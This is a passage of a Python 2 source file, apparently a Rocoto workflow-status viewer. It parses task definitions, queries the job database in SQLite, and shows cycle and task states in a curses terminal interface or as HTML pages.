ucgs_is_cron = True
only_once_ugcs = True
else:
start_cycle = produtil.numerics.to_datetime ( cycle_string[0] )
end_cycle = produtil.numerics.to_datetime ( cycle_string[1] )
inc_cycle = produtil.numerics.to_timedelta( cycle_string[2] )
while start_cycle <= end_cycle:
cycledef_group_cycles[cycle_def_name].append(start_cycle.strftime("%Y%m%d%H%M"))
if PACKAGE.lower() == 'ugcs' and ucgs_is_cron:
try:
start_cycle = start_cycle + relativedelta(months=+inc_cycle)
except AttributeError:
curses.endwin()
print;print
print 'dateutil which uses relativedelta to increment monthly (used by UGCS) is not supported with this version of python.\nUse Anaconda the native version in /user/bin'
sys.exit(-1)
else:
start_cycle = start_cycle + inc_cycle
#if list_tasks:
#print 'cycledef=%s number of cycles %s inc: %s'%(cycle_def_name, len(cycledef_group_cycles[cycle_def_name]),inc_cycle)
#print 'contails cycles',cycledef_group_cycles[cycle_def_name]
if child.tag == 'task':
task_name = child.attrib['name']
log_file = child.find('join').find('cyclestr').text.replace( '@Y@m@d@H','CYCLE' )
#if len(log_file) != 0:
# print 'LOG: %s %s'%( task_name, log_file )
if 'cycledefs' in child.attrib:
task_cycledefs = child.attrib['cycledefs']
#if list_tasks:
# print 'task_cycledefs:',task_cycledefs
else:
task_cycledefs = cycle_noname
if list_tasks:
print task_name,task_cycledefs
#dependancies = child.getiterator('dependency')
#for dependency in dependancies:
# for them in dependency.getchildren():
# print them.attrib
tasks_ordered.append((task_name,task_cycledefs,log_file))
elif child.tag == 'metatask':
all_metatasks_iterator = child.getiterator('metatask')
all_vars = dict() ; all_tasks = []
for i,metatasks in enumerate(all_metatasks_iterator):
metatask_name = 'NO_NAME'
try:
metatask_name = metatasks.attrib['name']
except:
pass
if list_tasks:
print ' '*i+'metatask:',metatask_name
all_vars_list = metatasks.findall('var')
all_tasks_list = metatasks.findall('task')
for var in all_vars_list:
var_list_values = var.text.split()
#print ' '+' '*i+'(%d) var name:'%i,var.attrib['name'],var_list_values
all_vars[var.attrib['name']] = var_list_values
for task in all_tasks_list:
task_name = task.attrib['name']
task_log = task.find('join').find('cyclestr').text.replace( '@Y@m@d@H','CYCLE' )
#if len(task_log) != 0:
# print 'LOG: %s %s'%( task_name, task_log)
#print ' '+' '*i+'(%d) task name:'%i,task.attrib['name']
if 'cycledefs' in task.attrib:
task_cycledefs = task.attrib['cycledefs']
#if list_tasks:
# print 'task_cycledefs (meta):',task_cycledefs
else:
task_cycledefs = cycle_noname
all_tasks.append((task_name,task_cycledefs,task_log))
add_task = []
for task_name in all_tasks:
first_task_resolved = False
first_task_resolved_name = ''
add_task[:] = []
add_task.append(task_name)
for name,vars in all_vars.iteritems():
replace_var = '#'+name+'#'
#print 'TASK_NAME: %s | %s'%(task_name,replace_var)
for each_task_name in add_task:
#for each_task_name in all_tasks:
if replace_var in each_task_name[0]:
for var in vars:
new_task_name = each_task_name[0].replace(replace_var, var)
new_task_log = each_task_name[2].replace(replace_var, var)
add_task.append((new_task_name,each_task_name[1],new_task_log))
for task in add_task:
if '#' not in task[0]:
if task[0] not in [ j[0] for j in tasks_ordered]:
tasks_ordered.append(task)
if not first_task_resolved:
first_task_resolved = True
first_task_resolved_name = task[0]
if metatask_name == 'NO_NAME':
metatask_list[task[0]].append(task[0])
else:
metatask_list[task[0]].append(metatask_name)
metatask_list[task[0]].append(task[0])
else:
metatask_list[first_task_resolved_name].append(task[0])
if list_tasks:
print ' '+' '*i+task[0],task[1],'LOG:',task[2]
# Default expantion of metatasks True = collapsed
#for metatask,metatasks in metatask_list.iteritems():
# metatask_list[metatask].append(True)
return tasks_ordered,metatask_list,cycledef_group_cycles
def get_rocoto_stat(params, queue_stat):
workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles = params
global temp_workflow_file
global database_file_agmented
if len(tasks_ordered) == 0 or len(metatask_list) == 0 or len(cycledef_group_cycles) == 0 or list_tasks:
tasks_ordered, metatask_list,cycledef_group_cycles = get_tasklist(temp_workflow_file)
if use_performance_metrics:
aug_perf = get_aug_perf_values(get_user)
else:
aug_perf = None
info=collections.defaultdict(list)
cycles=set()
connection=sqlite3.connect(database_file)
c=connection.cursor()
if use_performance_metrics:
q=c.execute("DROP TABLE IF EXISTS jobs_augment_tmp;")
sql_create_augment_table = "CREATE TABLE jobs_augment_tmp AS SELECT * FROM jobs;"
q=c.execute(sql_create_augment_table)
q=c.execute("alter table jobs_augment_tmp add column qtime integer;")
q=c.execute("alter table jobs_augment_tmp add column cputime integer;")
q=c.execute("alter table jobs_augment_tmp add column runtime integer;")
q=c.execute("alter table jobs_augment_tmp add column slots integer;")
sq_command = ''
column_updates = ('qtime','cputime','runtime','slots')
sqlite_merge_command = "%s=(SELECT jobs_augment.%s FROM jobs_augment WHERE jobs_augment.id=jobs_augment_tmp.id)"
for column in column_updates:
sq_command += sqlite_merge_command%(column,column)+','
sq_command=';'.join(sq_command.rsplit(',', 1))
sq_command = 'UPDATE jobs_augment_tmp SET '+sq_command
q=c.execute(sq_command)
sq_command = 'UPDATE jobs_augment_tmp SET '
sqlite_update_command = "%s = '%s' WHERE jobs_augment_tmp.jobid = %s"
#debug.write('WRITING TO DATABASE'+'\n')
for perf_jobid,perf_values in aug_perf.iteritems():
for name,each_value in perf_values.iteritems():
q=c.execute(sq_command+sqlite_update_command%(name,each_value,perf_jobid))
#debug.write('SQL: '+sq_command+sqlite_update_command%(name,each_value,perf_jobid+'\n'))
qinfo=c.execute("DROP TABLE IF EXISTS jobs_augment;")
qinfo=c.execute("ALTER TABLE jobs_augment_tmp RENAME TO jobs_augment;")
cycledifitions = []
q=c.execute('SELECT id, groupname, cycledef FROM cycledef')
for row in q:
(theid, groupname, cycledef) = row
cycledifitions.append( (theid, groupname, cycledef) )
cycle_done_stat = dict()
q=c.execute('SELECT id,cycle,done FROM cycles')
for row in q:
(theid,cycle,done)=row
cycles.add(cycle)
cycle_done_stat[cycle]=done
if use_performance_metrics:
q=c.execute('SELECT id,jobid,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots FROM jobs_augment')
else:
q=c.execute('SELECT id,jobid,taskname,cycle,state,exit_status,duration,tries FROM jobs')
q_get = []
entered_jobids = []
last_task_index = 0
for row in q:
row = tuple('-' if x is None else x for x in row)
if use_performance_metrics:
(theid, jobid,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots)=row
else:
(theid, jobid,taskname,cycle,state,exit_status,duration,tries,)=row
if jobid in entered_jobids:
continue
else:
if taskname in tasks_ordered:
task_index = [x[0] for x in task_ordered].index(taskname)
#task_index = tasks_ordered.index(taskname)
last_task_index = task_index
else:
task_index = last_task_index
if use_performance_metrics:
q_get.append( (theid,jobid,task_index,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots) )
else:
q_get.append( (theid,jobid,task_index,taskname,cycle,state,exit_status,duration,tries) )
entered_jobids.append(jobid)
q_get.sort( key=lambda x: x[2] )
connection.commit()
c.close()
for row in q_get:
if use_performance_metrics:
(theid,jobid,task_order,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots)=row
else:
(theid,jobid,task_order,taskname,cycle,state,exit_status,duration,tries)=row
if jobid != '-':
if use_performance_metrics:
line = '%s %s %s %s %s %s %s %s %s %s %s'%(datetime.datetime.fromtimestamp(cycle).strftime('%Y%m%d%H%M'),taskname,str(jobid),str(state),str(exit_status),str(tries),str(duration).split('.')[0],str(slots),str(qtime),str(cputime).split('.')[0],str(runtime))
else:
line = '%s %s %s %s %s %s %s'%(datetime.datetime.fromtimestamp(cycle).strftime('%Y%m%d%H%M'),taskname,str(jobid),str(state),str(exit_status),str(tries),str(duration).split('.')[0])
#debug.write('LINE: '+line+'\n')
info[cycle].append(line)
for every_cycle in cycles:
if len(info[every_cycle]) == 0:
info[every_cycle].append('place holder')
new_info=collections.defaultdict(list)
job_ids = []
job_id = ''
for each_cycle,lines_in_cycle in info.iteritems():
for task in tasks_ordered:
skip_task = False
for each_line in lines_in_cycle:
if task[0] == each_line.split()[1]:
#if task[0]+' ' in each_line:
job_id = each_line.split()[2]
if job_id in job_ids:
break
cycle_string = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')
#print 'TESTB:', len(task), task[0],task[1]
cycledefs = task[1].split(',')
if len(cycledefs) > 1:
#print 'Checking if %s for %s is in a gfs cycle:'%(task[0],cycle_string)
for each_cycledef in cycledefs:
#print 'group:', each_cycledef, cycledef_group_cycles[each_cycledef]
if cycle_string in cycledef_group_cycles[each_cycledef]:
#print 'Found:', task[0],'with cycle',cycle_string
new_info[each_cycle].append(each_line)
job_ids.append(job_id)
skip_task = True
break
elif cycle_string in cycledef_group_cycles[task[1]]:
new_info[each_cycle].append(each_line)
job_ids.append(job_id)
skip_task = True
break
if skip_task:
continue
line = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')+' '*7+task[0]+' - - - - -'
cycle_string = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')
cycledefs = task[1].split(',')
if len(cycledefs) > 1:
for each_cycledef in cycledefs:
if cycle_string in cycledef_group_cycles[each_cycledef]:
new_info[each_cycle].append(line)
skip_task = True
break
elif cycle_string in cycledef_group_cycles[task[1]]:
new_info[each_cycle].append(line)
skip_task = True
if skip_task:
continue
rocoto_stat = []
for cycle in sorted(cycles):
if len(new_info[cycle]) != 0:
rocoto_stat.append(new_info[cycle])
if save_checkfile_path is not None:
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
with open(save_checkfile_path, 'w') as savefile:
rocoto_data_and_time = (rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles, stat_update_time)
cPickle.dump(rocoto_data_and_time, savefile)
if only_check_point:
sys.exit(0)
if use_multiprocessing:
queue_stat.put((rocoto_stat, tasks_ordered, metatask_list, cycledef_group_cycles))
else:
return (rocoto_stat, tasks_ordered, metatask_list, cycledef_group_cycles)
def display_results(results,screen,params):
from produtil.fileop import check_file
results_lines = results.split('\n')
num_lines,num_columns = (len(results_lines)+3,len(max(results_lines, key=len))+1)
pad_pos = 0
force_load_stat = False
global mlines
global mcols
while True:
screen.clear()
screen.refresh()
results_pad = curses.newpad(num_lines,num_columns)
for results_line in results_lines:
results_pad.addstr(results_line+'\n')
results_pad.refresh( pad_pos, 0, 0,0, mlines-3,mcols-1)
extra_1 = extra_2 = ''
if pad_pos < num_lines-mlines-2 or pad_pos > 0:
extra_1 = '<Page Up>/<Page Down> Scroll'
if len(params) != 0:
extra_2 = '<s>ave results to a file'
screen.addstr(mlines-1,0,'<ENTER> Return %s %s'%(extra_1,extra_2),curses.A_BOLD)
event = screen.getch()
if event == curses.KEY_RESIZE:
screen.refresh()
elif event in ( curses.KEY_PPAGE, ord('u') ):
if pad_pos < num_lines-mlines-2:
pad_pos += 1
elif event in ( curses.KEY_NPAGE, ord('d') ):
if pad_pos != 0:
pad_pos -= 1
elif event == curses.KEY_ENTER or event == 10:
screen.clear()
break
elif event == ord('s'):
strg = []
strg.append(PSLOT)
for i in range(2,5):
try:
if ' ' not in basename(params[i]):
strg.append(basename(params[i]).split('.')[0])
except:
pass
if len(strg) == 0:
strg = 'rocotoviewer_outout_file'
save_results_file = '_'.join(strg)+'.txt'
inc_int = 0
while check_file(save_results_file):
if '(%d)'%inc_int in save_results_file:
save_results_file = save_results_file.replace('(%d)'%inc_int,'(%d)'%(inc_int+1))
inc_int += 1
else:
save_results_file = basename(save_results_file.split('.')[0])+'(%d)'%inc_int+'.txt'
out_file = open(save_results_file,'w')
out_file.write(results)
out_file.close()
screen.addstr(mlines-1,0,'Saved file %s'%save_results_file+' '*10)
screen.refresh()
std_time.sleep(0.5)
return
def main(screen):
global mlines
global mcols
global default_column_length
global use_multiprocessing
global highlightText
global highlightSelectedText
global normalText
global PSLOT
global PACKAGE
global entity_values
event = 10
if not sys.stdin.isatty():
if screen != 'dummy':
print 'There seems to be a problem with the curses init'
sys.exit(-1)
else:
mlines = 100
else:
mlines, mcols = screen.getmaxyx()
#global debug
#PWD = os.getcwd()
#debug = open(PWD+'/debug.log','a',0)
(workflow_file,database_file) = get_arguments()
if not load_produtil_pythonpath():
curses.endwin()
print '\n\nCRITICAL ERROR: The produtil package could not be loaded from your system'
sys.exit(-1)
if html_output:
if sys.stdin.isatty():
curses.endwin()
print '\nPreparing to write out an html folder'
use_multiprocessing = False
import produtil.run, produtil.numerics
from produtil.run import run,runstr, batchexe
from produtil.fileop import check_file, makedirs, deliver_file, remove_file, make_symlinks_in
from produtil.prog import shbackslash
header_string = ' CYCLE TASK JOBID STATE EXIT TRIES DURATION'
header_string_under = '========(updated:tttttttttttttttt)========== PSLOT: pslot ==========================='
global use_performance_metrics
aug_perf = collections.defaultdict(dict)
if use_performance_metrics:
result = augment_SQLite3( database_file )
aug_perf = get_aug_perf_values(get_user)
header_string += ' SLOTS QTIME CPU RUN\n'
header_string_under += '=============================\n'
header_string += header_string_under
default_column_length = 122
else:
aug_perf = None
header_string = header_string+'\n'+header_string_under+'\n'
default_column_length = 91
html_output_dir = None
entity_values = get_entity_values( workflow_file )
workflow_name = 'gfs_workflow'
if 'ROTDIR' in entity_values:
ROTDIR = entity_values['ROTDIR']
else:
ROTDIR = 'no_rotdir'
if 'PSLOT' in entity_values:
PSLOT = entity_values['PSLOT']
else:
PSLOT = 'no_name'
if 'PACKAGE' in entity_values:
PACKAGE = entity_values['PACKAGE']
if PACKAGE == 'ugcs':
workflow_name = 'ugcs_workflow'
if PACKAGE == 'gfs':
workflow_name = 'gfs_workflow'
else:
PACKAGE = 'none'
if 'EXPDIR' in entity_values:
EXPDIR = entity_values['EXPDIR']
else:
EXPDIR = '.'
if html_output:
html_ptr = None
if not send_html_to_rzdm and len(rzdm_path) != 0:
html_output_dir = shbackslash(rzdm_path)
else:
html_output_dir = shbackslash('%s/pr%s'%(workflow_name,PSLOT))
print 'writing html to directory:',html_output_dir
html_output_file = shbackslash( html_output_dir+'/index.html' )
html_header_line = '<table>\n<thead><tr><td>CYCLE</td><td>TASK</td><td>JOBID</td><td>STATE</td><td>EXIT</td><td>TRIES</td><td>DURATION</td>'
if use_performance_metrics:
html_header_line = html_header_line+'<td>SLOTS</td><td>QTIME</td><td>CPU</td><td>RUN</td>'+'</tr></thead>\n<tbody>'
else:
html_header_line = html_header_line+'</tr></thead>\n<tbody>'
print 'Generating html folder html: %s ...'%html_output_file
cmd = batchexe('rm') ['-Rf', html_output_dir ]
stat=runstr(cmd)
makedirs( html_output_dir )
html_ptr = open(html_output_file,'w')
html_ptr.write(ccs_html)
break_file = False
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
html_discribe_line = '\n<table>\n<thead>\n<tr><td><a href="index_exp.html">Expand</a></td><td>Refreshed: %s</td><td>PSLOT: %s</td></tr>\n'%(stat_update_time,PSLOT)
html_discribe_line += '<tr><td colspan="2">ROTDIR: %s</td><td><a href="../%s_perf_%s.pdf">Turn Around Times</a></td></tr>\n</thead>\n</table>\n<br>\n'%(workflow_name,ROTDIR,PSLOT)
html_discribe_line += html_header_line
html_ptr.write( html_discribe_line )
else:
curses.start_color()
curses.use_default_colors()
screen.refresh()
curses.mousemask(1)
curses.noecho()
for i in range(0, curses.COLORS):
curses.init_pair(i + 1, i,curses.COLOR_BLACK)
if i == 4:
curses.init_pair(i + 1, i,curses.COLOR_WHITE)
curses.init_pair(8, 0, -1)
curses.mousemask(curses.ALL_MOUSE_EVENTS)
#curses.init_pair(6,curses.COLOR_BLACK, curses.COLOR_CYAN)
highlightText = curses.A_STANDOUT
highlightSelectedText = curses.color_pair(5)
normalText = curses.A_NORMAL
cmd = batchexe('which') ['rocotorun']
try:
which_rocoto = runstr(cmd).strip()
except Exception,e:
curses.endwin()
print '\n\nCRITICAL ERROR: rocotorun is not in your path, user "module load rocoto"'
sys.exit(0)
os.environ['TZ']='UTC'
std_time.tzset()
#stdout_buff = StringIO()
#stderr_buff = StringIO()
#sys.stdout = stdout_buff
#sys.stderr = stderr_buff
HOME = os.environ['HOME']
rocoto_temp = HOME+'/.rocoto/tmp'
makedirs( rocoto_temp )
global temp_workflow_file
workflow_basename = basename(workflow_file)+'.'
temp_file= tempfile.NamedTemporaryFile(prefix=workflow_basename, dir=rocoto_temp, delete=False)
temp_workflow_file = temp_file.name
old = open(workflow_file)
temp = []
for line in old:
if '&ENV_VARS;' not in line:
temp.append(line)
for line in temp:
temp_file.write(line)
temp_file.close()
old.close()
tasks_ordered = []
metatask_list = collections.defaultdict(list)
cycledef_group_cycles = collections.defaultdict(list)
queue_stat = Queue()
queue_check = Queue()
if only_check_point:
curses.endwin()
sys.stdout = os.fdopen(0,'w',0)
print 'Creating check point file ...'
params = (workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles )
get_rocoto_stat( params, queue_stat )
stat_update_time = ''
params_check = ''
header = None
process_get_rocoto_stat = None
process_get_rocoto_check = None
cycle = 0
if html_output:
mlines = 100
mcols = 125
if not html_output and mcols < default_column_length:
curses.endwin()
print
print 'Your terminal is only %d characters must be at least %d to display workflow status'%(mcols,default_column_length)
sys.exit(-1)
if not html_output:
screen.refresh()
rocoto_stat_params = ''
rocoto_stat_params_tmp = ''
step = 0.0 ; i = 0
dots = ('. ','.. ','... ','.... ','.....',' ....',' ...',' .')
dot_stat = 0 ; dot_check = 0
current_time = time()
meta_tasklist = collections.defaultdict(list)
if save_checkfile_path is not None and check_file(save_checkfile_path):
with open(save_checkfile_path) as savefile:
rocoto_data_and_time = cPickle.load(savefile)
rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles, stat_update_time = rocoto_data_and_time
start_time = time() - stat_read_time_delay - 10
header = header_string
header = header.replace('t'*16,stat_update_time)
if PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
elif PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
else:
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
if list_tasks:
params = (workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles )
get_rocoto_stat( params, Queue() )
curses.endwin()
sys.stdout = os.fdopen(0,'w',0)
sys.exit(0)
if save_checkfile_path is None or (save_checkfile_path is not None and not check_file(save_checkfile_path)):
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
if use_multiprocessing:
process_get_rocoto_stat = Process( target=get_rocoto_stat, args=[params, queue_stat] )
process_get_rocoto_stat.start()
screen.addstr(mlines-2,0,'No checkpoint file, must get rocoto stats please wait',curses.A_BOLD)
screen.addstr(mlines-1,0,'Running rocotostat ',curses.A_BOLD)
else:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = get_rocoto_stat( params, Queue() )
header = header_string
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header.replace('t'*16,stat_update_time)
if PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
elif PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
else:
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
while use_multiprocessing:
if mcols < default_column_length:
curses.endwin()
print
print 'Your terminal is only %d characters must be at least %d to display workflow status'%(mcols,default_column_length)
sys.exit(-1)
step += 0.001
if step > 100:
step = 0.0
i = (0 if i == len(dots)-1 else i+1 )
curses.curs_set(0)
screen.addstr(mlines-1,19,dots[i],curses.A_BOLD)
screen.refresh()
try:
rocoto_stat_params = queue_stat.get_nowait()
except:
pass
if len(rocoto_stat_params) != 0:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = rocoto_stat_params
if use_multiprocessing:
process_get_rocoto_stat.join()
process_get_rocoto_stat.terminate()
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
if PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
elif PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
else:
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
break
start_time = time()
num_cycle = len(rocoto_stat)
time_to_load = (time()- current_time)/60.0
pad_pos = 0
update_pad = True
task = 0 ; execute_task = '' ; execute_cycle = ''
loading_stat = False
loading_check = False
find_next = 0
check_task = '' ; check_cycle = ''
rocoto_check = ''
break_twice = False
search_string = ''
meta_tasks = []
metatasks_state_cycle = []
metatasks_state_string_cycle = []
metatask_list_copy = collections.defaultdict(list)
metatask_name = collections.defaultdict(list)
for each_metatask in metatask_list:
metatask_name[each_metatask] = metatask_list[each_metatask][0]
del metatask_list[each_metatask][0]
tasks_in_cycle = []
for each_cycle in rocoto_stat:
list_of_tasks_per_cycle = []
meta_tasks_in_cycle = []
for each_line in each_cycle:
line_has_metatask = False
for check_metatask, check_metatask_list in metatask_list.iteritems():
if check_metatask in each_line:
meta_tasks_in_cycle.append( (check_metatask, True, check_metatask_list ) )
line_has_metatask = True
continue
else:
for every_meta_task in check_metatask_list:
each_element_in_line = each_line.split()
if every_meta_task != check_metatask:
for item in each_element_in_line:
if every_meta_task == item:
meta_tasks_in_cycle.append((every_meta_task, False, check_metatask) )
line_has_metatask = True
if not line_has_metatask:
if '---' not in each_line.split()[1]:
list_of_tasks_per_cycle.append(each_line.split()[1])
meta_tasks_in_cycle.append(('False',False,'False'))
tasks_in_cycle.append(list_of_tasks_per_cycle)
meta_tasks_state = dict()
meta_tasks_state_string = dict()
for check_metatask, check_metatask_list in metatask_list.iteritems():
meta_tasks_state[check_metatask] = True
meta_tasks_state_string[check_metatask] = ''
meta_tasks_state['False'] = False
meta_tasks.append(meta_tasks_in_cycle)
metatasks_state_cycle.append(meta_tasks_state)
metatasks_state_string_cycle.append(meta_tasks_state_string)
update_metatask_state_status_message = True
'''
# This lists each metatask and its elements
# for the first cycle for code edification
curses.endwin()
print
for each_metatask in meta_tasks[0]:
if each_metatask[1]:
print metatask_name[each_metatask[2][0]]
for task in each_metatask[2]:
print '',task
sys.exit(0)
'''
metatask_list_per_cycle = []
metatask_list_by_name = collections.defaultdict(dict)
for each_cycle in meta_tasks:
list_of_metatasks_in_cycle = []
for each_metatask in each_cycle:
if each_metatask[1]:
tasks_in_metatask_list = []
for task in each_metatask[2]:
tasks_in_metatask_list.append( task )
metatask_list_by_name[ metatask_name[each_metatask[2][0]] ] = tasks_in_metatask_list
list_of_metatasks_in_cycle.append( metatask_name[each_metatask[2][0]] )
metatask_list_per_cycle.append(list_of_metatasks_in_cycle)
found = False
end_found = False
found_cycle = 0
found_end_cycle = 0
for find_cycle in range(0,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if not found and any(x in lines for x in ['RUNNING', 'QUEUED']):
found = True
found_cycle = find_cycle
if found and not any(x in lines for x in ['RUNNING', 'QUEUED']):
end_found = True
found_end_cycle = find_cycle
break
get_number_of_stats = 0
if found:
cycle = found_cycle
else:
get_number_of_stats = 2
if len(rocoto_stat) > 2:
cycle = len(rocoto_stat) - 2
else: cycle = 0
if html_output:
if cycle > 2:
cycle -= 2
html_start_cycle = cycle
html_output_firstpass = True
#debug.write('num cycles: %s\n'%str(len(rocoto_stat)))
while True:
num_columns = default_column_length
mlines = 90; mcols = 125
if header is None:
header = ' '
if update_pad is True:
#debug.write('cycle: %s\n'%str(cycle))
num_lines = len(rocoto_stat[cycle])
#debug.write('len rocoto_stat[cycle]: %s\n'%str(num_lines))
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2]) - 1
num_lines -= line_correction
update_pad = False
line_number = -1
colapsed_metatask = False
for line_num,line in enumerate(rocoto_stat[cycle]):
columns = line.split()
count_columns = line.split(' ')
spaces = []
for c,sub_group in groupby(count_columns):
if c != '': continue
spaces.append(' '*len(list(sub_group)))
spaces.append('')
text_color = {'SUCCEEDED':3,'QUEUED':4,'DEAD':2,'FAILED':2,'RUNNING':6}
skip_task = False
if not meta_tasks[cycle][line_num][1] and metatasks_state_cycle[cycle][ meta_tasks[cycle][line_num][2] ] :
skip_task = True
else:
line_number +=1
html_line = '<tr>'
if use_performance_metrics and len(columns) == 7:
for i in range(0,4):
columns.append('-')
for i,column in enumerate(columns):
if skip_task: continue
if not use_performance_metrics and i > 7: continue
execute_cycle = columns[0]
if i == 0:
if meta_tasks[cycle][line_num][1]:
if metatasks_state_cycle[cycle][columns[1]]:
colapsed_metatask = True
if update_metatask_state_status_message or len(metatasks_state_string_cycle[cycle][ columns[1] ])==0:
get_state_list = []
total_numer_of_tasks = len(meta_tasks[cycle][line_num][2])
for check_metatask_line in rocoto_stat[cycle]:
split_check_metatask_line = check_metatask_line.split()
for each_metatask in meta_tasks[cycle][line_num][2]:
if each_metatask == split_check_metatask_line[1]:
get_state_list.append(split_check_metatask_line[3])
metatask_state = columns[3]
if 'SUCCEEDED' in get_state_list:
metatask_state = '(%d/%d) SUCCEEDED'%(get_state_list.count('SUCCEEDED'),total_numer_of_tasks)
if 'QUEUED' in get_state_list:
metatask_state = '(%d/%d) QUEUED'%(get_state_list.count('QUEUED'),total_numer_of_tasks)
if 'RUNNING' in get_state_list:
metatask_state = '(%d/%d) RUNNING'%(get_state_list.count('RUNNING'),total_numer_of_tasks)
if 'DEAD' in get_state_list:
metatask_state = '(%d/%d) DEAD'%(get_state_list.count('DEAD'),total_numer_of_tasks)
metatasks_state_string_cycle[cycle][ columns[1] ] = metatask_state
html_line += '<td>'+column+'</td>'
elif i == 1:
save_column = column
if colapsed_metatask:
colapsed_metatask = False
column = metatask_name[column]
display_column = (column if len(column) < 40 else column[:40])
if line_number == task:
execute_task = save_column
if html_output:
log_file = ''
for find_task in tasks_ordered:
if find_task[0] == column:
log_file = find_task[2].replace('CYCLE', execute_cycle[:-2] )
if check_file(shbackslash( log_file )):
deliver_file( log_file, html_output_dir )
log_file_base = os.path.basename(log_file)
html_line += '<td><a href="%s">'%log_file_base+display_column+'</a></td>'
else:
html_line += '<td>'+display_column+'</td>'
elif i == 2:
if len(column) > 7:
column = column[:7]
html_line += '<td>'+column+'</td>'
elif i == 3:
if meta_tasks[cycle][line_num][1] and len(metatasks_state_string_cycle[cycle][ columns[1] ].split())!=1 and metatasks_state_cycle[cycle][columns[1]]:
column = metatasks_state_string_cycle[cycle][ columns[1] ]
if len(column)>15:
if column.split()[1] == 'SUCCEEDED':
html_line += '<td><green>'+column[:15]+'</green></td>'
elif column.split()[1] == 'QUEUED':
html_line += '<td><yellow>'+column[:15]+'</yellow></td>'
elif column.split()[1] in('DEAD','FAILED'):
html_line += '<td><red>'+column[:15]+'</red></td>'
elif column.split()[1] == 'RUNNING':
html_line += '<td><blue>'+column[:15]+'</blue></td>'
else:
html_line += '<td>'+column[:15]+'</td>'
else:
if column.split()[1] == 'SUCCEEDED':
html_line += '<td><green>'+column+'</green></td>'
elif column.split()[1] == 'QUEUED':
html_line += '<td><yellow>'+column+'</yellow></td>'
elif column.split()[1] in('DEAD','FAILED'):
html_line += '<td><red>'+column+'</red></td>'
elif column.split()[1] == 'RUNNING':
html_line += '<td><blue>'+column+'</blue></td>'
else:
html_line += '<td>'+column+'</td>'
elif column in text_color:
if column == 'SUCCEEDED':
html_line += '<td><green>'+column+'</green></td>'
elif column == 'QUEUED':
html_line += '<td><yellow>'+column+'</yellow></td>'
elif column in('DEAD','FAILED'):
html_line += '<td><red>'+column+'</red></td>'
elif column == 'RUNNING':
html_line += '<td><blue>'+column+'</blue></td>'
else:
html_line += '<td>'+column+'</td>'
else:
html_line += '<td>'+column+'</td>'
else:
if len(column)<6:
html_line += '<td>'+column+'</td>'
else:
html_line += '<td>'+column+'</td>'
if not skip_task:
html_line += '</tr>\n'
html_ptr.write(html_line)
update_metatask_state_status_message = False
found_still_running = False
cycle += 1
update_pad = True
for find_cycle in range(cycle,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if 'RUNNING' in lines:
found_still_running = True
break
break
if get_number_of_stats >= 0:
found_still_running = True
if cycle < len(rocoto_stat) or found_still_running:
html_line = '</table>\n'
html_line += '\n<br>\n\n'
html_line += html_header_line
html_ptr.write(html_line)
get_number_of_stats -= 1
else:
html_line = '</tbody>\n'
html_line += '</table>\n'
html_line += '</html>\n'
html_ptr.write(html_line)
html_ptr.close()
if html_output_firstpass:
for meta_cycle in range(0,len(rocoto_stat)):
for execute_task in metatasks_state_cycle[meta_cycle]:
metatasks_state_cycle[meta_cycle][execute_task] = False
html_output_file = shbackslash( html_output_dir+'/index_exp.html' )
html_ptr = open(html_output_file,'w')
html_ptr.write(ccs_html)
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
html_discribe_line = '\n<table>\n<thead>\n<tr><td><a href="index.html">Collapse</a></td><td>Refreshed: %s</td><td>PSLOT: %s</td></tr>\n'%(stat_update_time,PSLOT)
html_discribe_line += '<tr><td colspan="2">ROTDIR: %s</td><td><a href="../%s_perf_%s.pdf">Turn Around Times</a></td></tr>\n</thead>\n</table>\n<br>\n'%(workflow_name,ROTDIR,PSLOT)
html_discribe_line += html_header_line
html_ptr.write( html_discribe_line )
html_output_firstpass = False
#cycle = html_start_cycle
if not html_output_firstpass:
